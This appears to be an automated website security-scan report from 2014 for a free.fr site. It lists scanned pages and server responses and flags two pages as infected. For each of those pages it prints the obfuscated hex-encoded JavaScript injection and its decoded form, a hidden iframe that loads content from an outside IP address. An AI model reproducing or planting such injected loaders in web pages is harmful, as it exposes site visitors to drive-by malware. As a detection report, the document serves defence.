Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yoel1.free.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yoel1.free.fr/ | HTTP/1.1 200 OK Connection: close Date: Sat, 20 Dec 2014 15:56:27 GMT Accept-Ranges: bytes ETag: "c80df-ae9-4814f31a" Server: Apache/ProXad [Sep 23 2014 15:26:28] Content-Length: 2793 Content-Type: text/html Last-Modified: Sun, 27 Apr 2008 21:41:46 GMT | clean |
http://yoel1.free.fr/m | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, must-revalidate Connection: close Date: Sat, 20 Dec 2014 15:56:27 GMT Location: http://yoel1.free.fr/m/ Server: Apache/ProXad [Sep 23 2014 15:26:28] Content-Type: text/html; charset=iso-8859-1 | clean |
http://yoel1.free.fr/m/ | 200 OK Content-Length: 14625 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v4814f307d8fa3(v4814f307dbad1){ function v4814f307dc298 () {var v4814f307dcef0=16; return v4814f307dcef0;} return(parseInt(v4814f307dbad1,v4814f307dc298()));}function v4814f307dd628(v4814f307dde06){ var v4814f307dedf0=2; var v4814f307de5f7='';for(v4814f307de9f3=0; v4814f307de9f3<v4814f307dde06.length; v4814f307de9f3+=v4814f307dedf0){ v4814f307de5f7+=(String.fromCharCode(v4814f307d8fa3(v4814f307dde06.substr(v4814f307de9f3, v4814f307dedf0))));}return v4814f307de5f7;} document.write(v4814f307dd628('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3937333162343265207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3731393638292B276363375C272077696474683D363932206865696768743D313034207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=9731b42e src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*71968)+'cc7\' width=692 height=104 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url <iframe src='http://url' width='1' height='1' style='visibility: hidden;'> | ||
http://yoel1.free.fr/m/acc.php | 200 OK Content-Length: 14481 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://yoel1.free.fr/m/sins.php | 200 OK Content-Length: 17075 Content-Type: text/html | clean |
http://yoel1.free.fr/m/sid.php | 401 Unauthorized Content-Length: 41 Content-Type: text/html | clean |
http://yoel1.free.fr/test404page.js | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://yoel1.free.fr/m/membres.php | 200 OK Content-Length: 15803 Content-Type: text/html | clean |
http://yoel1.free.fr/m/akc.php | 200 OK Content-Length: 14091 Content-Type: text/html | clean |
http://yoel1.free.fr/m/ajou.php | 200 OK Content-Length: 14115 Content-Type: text/html | clean |
http://yoel1.free.fr/m/modif.php | 200 OK Content-Length: 14129 Content-Type: text/html | clean |
http://yoel1.free.fr/m/code.php | 200 OK Content-Length: 14132 Content-Type: text/html | clean |
http://yoel1.free.fr/m/page.html | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://yoel1.free.fr/m/index.php | 200 OK Content-Length: 14625 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v4814f307d8fa3(v4814f307dbad1){ function v4814f307dc298 () {var v4814f307dcef0=16; return v4814f307dcef0;} return(parseInt(v4814f307dbad1,v4814f307dc298()));}function v4814f307dd628(v4814f307dde06){ var v4814f307dedf0=2; var v4814f307de5f7='';for(v4814f307de9f3=0; v4814f307de9f3<v4814f307dde06.length; v4814f307de9f3+=v4814f307dedf0){ v4814f307de5f7+=(String.fromCharCode(v4814f307d8fa3(v4814f307dde06.substr(v4814f307de9f3, v4814f307dedf0))));}return v4814f307de5f7;} document.write(v4814f307dd628('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3937333162343265207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3731393638292B276363375C272077696474683D363932206865696768743D313034207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=9731b42e src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*71968)+'cc7\' width=692 height=104 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url <iframe src='http://url' width='1' height='1' style='visibility: hidden;'> | ||
http://yoel1.free.fr/m/function.main | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
http://yoel1.free.fr/m/function.include | 404 Not Found Content-Length: 13253 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yoel1.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 15:56:27 GMT
Accept-Ranges: bytes
ETag: "c80df-ae9-4814f31a"
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Length: 2793
Content-Type: text/html
Last-Modified: Sun, 27 Apr 2008 21:41:46 GMT
...2793 bytes of data.
GET / HTTP/1.1
Host: yoel1.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 15:56:27 GMT
Accept-Ranges: bytes
ETag: "c80df-ae9-4814f31a"
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Length: 2793
Content-Type: text/html
Last-Modified: Sun, 27 Apr 2008 21:41:46 GMT
...2793 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yoel1.free.fr
Referer: http://www.google.com/search?q=yoel1.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yoel1.free.fr
Referer: http://www.google.com/search?q=yoel1.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.